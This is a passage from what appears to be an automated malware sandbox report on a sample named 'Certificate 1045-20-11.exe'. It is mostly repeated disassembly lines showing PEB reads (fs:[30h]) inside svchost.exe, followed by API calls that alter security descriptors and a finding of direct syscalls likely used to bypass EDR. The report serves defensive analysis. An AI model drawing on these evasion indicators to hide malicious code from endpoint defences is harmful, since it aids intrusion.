            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031551EF mov eax, dword ptr fs:[00000030h]1_2_031551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031351ED mov eax, dword ptr fs:[00000030h]1_2_031351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4000 mov ecx, dword ptr fs:[00000030h]1_2_031B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F903E mov eax, dword ptr fs:[00000030h]1_2_031F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F903E mov eax, dword ptr fs:[00000030h]1_2_031F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F903E mov eax, dword ptr fs:[00000030h]1_2_031F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F903E mov eax, dword ptr fs:[00000030h]1_2_031F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A020 mov eax, dword ptr fs:[00000030h]1_2_0312A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C020 mov eax, dword ptr fs:[00000030h]1_2_0312C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03205060 mov eax, dword ptr fs:[00000030h]1_2_03205060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132050 mov eax, dword ptr fs:[00000030h]1_2_03132050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D705E mov ebx, dword ptr fs:[00000030h]1_2_031D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D705E mov eax, dword ptr fs:[00000030h]1_2_031D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B052 mov eax, dword ptr fs:[00000030h]1_2_0315B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6050 mov eax, dword ptr fs:[00000030h]1_2_031B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov ecx, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141070 mov eax, dword ptr fs:[00000030h]1_2_03141070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315C073 mov eax, dword ptr fs:[00000030h]1_2_0315C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AD070 mov ecx, dword ptr fs:[00000030h]1_2_031AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B106E mov eax, dword ptr fs:[00000030h]1_2_031B106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03135096 mov eax, dword ptr fs:[00000030h]1_2_03135096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315D090 mov eax, dword ptr fs:[00000030h]1_2_0315D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315D090 mov eax, dword ptr fs:[00000030h]1_2_0315D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316909C mov eax, dword ptr fs:[00000030h]1_2_0316909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313208A mov eax, dword ptr fs:[00000030h]1_2_0313208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BD080 mov eax, dword ptr fs:[00000030h]1_2_031BD080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BD080 mov eax, dword ptr fs:[00000030h]1_2_031BD080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312D08D mov eax, dword ptr fs:[00000030h]1_2_0312D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F60B8 mov eax, dword ptr fs:[00000030h]1_2_031F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F60B8 mov ecx, dword ptr fs:[00000030h]1_2_031F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C80A8 mov eax, dword ptr fs:[00000030h]1_2_031C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B20DE mov eax, dword ptr fs:[00000030h]1_2_031B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031590DB mov eax, dword ptr fs:[00000030h]1_2_031590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov ecx, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov ecx, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov ecx, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov ecx, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C0 mov eax, dword ptr fs:[00000030h]1_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AD0C0 mov eax, dword ptr fs:[00000030h]1_2_031AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AD0C0 mov eax, dword ptr fs:[00000030h]1_2_031AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C0F0 mov eax, dword ptr fs:[00000030h]1_2_0312C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031720F0 mov ecx, dword ptr fs:[00000030h]1_2_031720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031550E4 mov eax, dword ptr fs:[00000030h]1_2_031550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031550E4 mov ecx, dword ptr fs:[00000030h]1_2_031550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0312A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032050D9 mov eax, dword ptr fs:[00000030h]1_2_032050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031380E9 mov eax, dword ptr fs:[00000030h]1_2_031380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B60E0 mov eax, dword ptr fs:[00000030h]1_2_031B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130710 mov eax, dword ptr fs:[00000030h]1_2_03130710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160710 mov eax, dword ptr fs:[00000030h]1_2_03160710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316F71F mov eax, dword ptr fs:[00000030h]1_2_0316F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316F71F mov eax, dword ptr fs:[00000030h]1_2_0316F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03137703 mov eax, dword ptr fs:[00000030h]1_2_03137703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03135702 mov eax, dword ptr fs:[00000030h]1_2_03135702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03135702 mov eax, dword ptr fs:[00000030h]1_2_03135702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C700 mov eax, dword ptr fs:[00000030h]1_2_0316C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320B73C mov eax, dword ptr fs:[00000030h]1_2_0320B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320B73C mov eax, dword ptr fs:[00000030h]1_2_0320B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320B73C mov eax, dword ptr fs:[00000030h]1_2_0320B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320B73C mov eax, dword ptr fs:[00000030h]1_2_0320B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03129730 mov eax, dword ptr fs:[00000030h]1_2_03129730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03129730 mov eax, dword ptr fs:[00000030h]1_2_03129730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03165734 mov eax, dword ptr fs:[00000030h]1_2_03165734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313973A mov eax, dword ptr fs:[00000030h]1_2_0313973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313973A mov eax, dword ptr fs:[00000030h]1_2_0313973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov ecx, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AC730 mov eax, dword ptr fs:[00000030h]1_2_031AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EF72E mov eax, dword ptr fs:[00000030h]1_2_031EF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03133720 mov eax, dword ptr fs:[00000030h]1_2_03133720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314F720 mov eax, dword ptr fs:[00000030h]1_2_0314F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314F720 mov eax, dword ptr fs:[00000030h]1_2_0314F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314F720 mov eax, dword ptr fs:[00000030h]1_2_0314F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F972B mov eax, dword ptr fs:[00000030h]1_2_031F972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]1_2_0316C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]1_2_0316C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130750 mov eax, dword ptr fs:[00000030h]1_2_03130750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE75D mov eax, dword ptr fs:[00000030h]1_2_031BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]1_2_03172750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]1_2_03172750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4755 mov eax, dword ptr fs:[00000030h]1_2_031B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03143740 mov eax, dword ptr fs:[00000030h]1_2_03143740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03143740 mov eax, dword ptr fs:[00000030h]1_2_03143740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03143740 mov eax, dword ptr fs:[00000030h]1_2_03143740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov esi, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138770 mov eax, dword ptr fs:[00000030h]1_2_03138770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203749 mov eax, dword ptr fs:[00000030h]1_2_03203749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B765 mov eax, dword ptr fs:[00000030h]1_2_0312B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B765 mov eax, dword ptr fs:[00000030h]1_2_0312B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B765 mov eax, dword ptr fs:[00000030h]1_2_0312B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312B765 mov eax, dword ptr fs:[00000030h]1_2_0312B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EF78A mov eax, dword ptr fs:[00000030h]1_2_031EF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032037B6 mov eax, dword ptr fs:[00000030h]1_2_032037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315D7B0 mov eax, dword ptr fs:[00000030h]1_2_0315D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F7BA mov eax, dword ptr fs:[00000030h]1_2_0312F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B97A9 mov eax, dword ptr fs:[00000030h]1_2_031B97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BF7AF mov eax, dword ptr fs:[00000030h]1_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BF7AF mov eax, dword ptr fs:[00000030h]1_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BF7AF mov eax, dword ptr fs:[00000030h]1_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BF7AF mov eax, dword ptr fs:[00000030h]1_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BF7AF mov eax, dword ptr fs:[00000030h]1_2_031BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031307AF mov eax, dword ptr fs:[00000030h]1_2_031307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313C7C0 mov eax, dword ptr fs:[00000030h]1_2_0313C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031357C0 mov eax, dword ptr fs:[00000030h]1_2_031357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031357C0 mov eax, dword ptr fs:[00000030h]1_2_031357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031357C0 mov eax, dword ptr fs:[00000030h]1_2_031357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B07C3 mov eax, dword ptr fs:[00000030h]1_2_031B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]1_2_031347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]1_2_031347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313D7E0 mov ecx, dword ptr fs:[00000030h]1_2_0313D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE7E1 mov eax, dword ptr fs:[00000030h]1_2_031BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03133616 mov eax, dword ptr fs:[00000030h]1_2_03133616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03133616 mov eax, dword ptr fs:[00000030h]1_2_03133616
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172619 mov eax, dword ptr fs:[00000030h]1_2_03172619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03161607 mov eax, dword ptr fs:[00000030h]1_2_03161607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE609 mov eax, dword ptr fs:[00000030h]1_2_031AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316F603 mov eax, dword ptr fs:[00000030h]1_2_0316F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03205636 mov eax, dword ptr fs:[00000030h]1_2_03205636
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E627 mov eax, dword ptr fs:[00000030h]1_2_0314E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F626 mov eax, dword ptr fs:[00000030h]1_2_0312F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03166620 mov eax, dword ptr fs:[00000030h]1_2_03166620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168620 mov eax, dword ptr fs:[00000030h]1_2_03168620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313262C mov eax, dword ptr fs:[00000030h]1_2_0313262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314C640 mov eax, dword ptr fs:[00000030h]1_2_0314C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03162674 mov eax, dword ptr fs:[00000030h]1_2_03162674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]1_2_031F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]1_2_031F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]1_2_0316A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]1_2_0316A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03169660 mov eax, dword ptr fs:[00000030h]1_2_03169660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03169660 mov eax, dword ptr fs:[00000030h]1_2_03169660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]1_2_03134690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]1_2_03134690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B368C mov eax, dword ptr fs:[00000030h]1_2_031B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B368C mov eax, dword ptr fs:[00000030h]1_2_031B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B368C mov eax, dword ptr fs:[00000030h]1_2_031B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B368C mov eax, dword ptr fs:[00000030h]1_2_031B368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031276B2 mov eax, dword ptr fs:[00000030h]1_2_031276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031276B2 mov eax, dword ptr fs:[00000030h]1_2_031276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031276B2 mov eax, dword ptr fs:[00000030h]1_2_031276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031666B0 mov eax, dword ptr fs:[00000030h]1_2_031666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C6A6 mov eax, dword ptr fs:[00000030h]1_2_0316C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312D6AA mov eax, dword ptr fs:[00000030h]1_2_0312D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312D6AA mov eax, dword ptr fs:[00000030h]1_2_0312D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0316A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A6C7 mov eax, dword ptr fs:[00000030h]1_2_0316A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313B6C0 mov eax, dword ptr fs:[00000030h]1_2_0313B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313B6C0 mov eax, dword ptr fs:[00000030h]1_2_0313B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313B6C0 mov eax, dword ptr fs:[00000030h]1_2_0313B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313B6C0 mov eax, dword ptr fs:[00000030h]1_2_0313B6C0
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0087A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0087A66C
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00868189 SetUnhandledExceptionFilter,0_2_00868189
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008681AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008681AC

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
